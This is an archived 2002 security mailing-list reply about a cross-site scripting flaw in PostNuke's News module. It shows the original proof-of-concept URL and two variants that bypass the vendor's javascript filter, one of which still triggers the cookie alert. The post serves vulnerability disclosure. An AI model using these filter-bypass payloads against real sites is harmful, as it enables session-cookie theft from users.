Re: Postnuke XSS fixed

From: Daniel Woods (dwoodsat_private)
Date: Wed Oct 02 2002 - 09:09:33 PDT

Next message: Matt Moore: "wp--02-0005: Multiple Vulnerabilities in SuperScout Web Reports Server"

Previous message: Sinan Eren: "RE: Solaris 2.6, 7, 8"
In reply to: Muhammad Faisal Rauf Danka: "Postnuke XSS fixed"
Next in thread: Sebastian Konstanty Zdrojewski: "Re: Postnuke XSS fixed"
Reply: Sebastian Konstanty Zdrojewski: "Re: Postnuke XSS fixed"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Humm!

> on 26th Sep the following url:
> http://news.postnuke.com/modules.php
>		?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>
> used to give Alert PopUp and
> Error:
> DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
> at line 23
>
> now it gives:
> Sorry - $HTTP_GET_VARS contains javascript...
>
> Prompt fix by PostNuke team, great work Keep it up! :)

Not so fast on the praise :(

It only took me a couple of workarounds to find ways to bypass the check.

  http://news.postnuke.com/modules.php
	  ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>

Using the request...
	  ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
gives me the DB Error: message

And using the request...
	  ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
gives me the Alert Popup and DB Error: message...  the '+' is treated as a blank.

Thanks... Dan.

Next message: Matt Moore: "wp--02-0005: Multiple Vulnerabilities in SuperScout Web Reports Server"
Previous message: Sinan Eren: "RE: Solaris 2.6, 7, 8"
In reply to: Muhammad Faisal Rauf Danka: "Postnuke XSS fixed"
Next in thread: Sebastian Konstanty Zdrojewski: "Re: Postnuke XSS fixed"
Reply: Sebastian Konstanty Zdrojewski: "Re: Postnuke XSS fixed"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Oct 02 2002 - 15:14:56 PDT